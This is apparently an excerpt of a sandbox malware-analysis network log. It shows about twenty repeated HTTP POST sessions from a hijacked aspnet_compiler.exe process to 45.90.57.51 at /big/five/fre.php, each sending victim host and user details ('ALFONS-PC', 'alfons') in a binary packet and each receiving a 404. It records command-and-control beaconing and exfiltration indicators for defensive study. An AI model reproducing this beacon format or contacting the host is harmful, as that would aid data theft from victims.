May 16, 2024 00:37:53.357475042 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:53.617485046 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49745	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:55.010656118 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:55.246855021 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:55.510827065 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49746	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:57.099162102 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:57.338119984 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:57.604254961 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49747	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:59.470457077 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:59.710521936 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:59.975322962 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49748	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:01.356158972 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:01.594136000 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:01.857131004 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49749	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:03.239293098 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:03.484527111 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:03.750636101 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49750	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:05.193094015 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:05.428921938 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:05.694541931 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49751	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:07.071739912 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:07.305646896 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:07.563893080 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49752	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:08.955748081 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:09.197555065 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:09.462527037 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49753	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:10.859695911 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:11.100202084 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:11.363615036 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49755	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:12.750489950 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:12.990989923 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:13.256185055 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49756	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:15.699410915 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:15.940907955 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:16.216450930 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49757	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:17.603709936 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:17.851574898 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:18.130280972 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49758	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:19.541568995 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:19.775937080 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:20.039736032 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49759	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:21.430033922 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:21.663501024 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:21.924787045 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49760	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:23.333174944 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:23.573502064 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:23.839876890 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49761	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:25.211848974 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:25.444598913 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:25.707920074 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49762	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:27.085627079 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:27.318540096 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:27.575263977 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49763	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:28.951649904 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:29.190665960 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:29.456072092 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49764	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:30.894418001 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:31.136183023 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:31.400897026 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49765	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:33.811515093 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:34.045253038 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:34.303761959 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

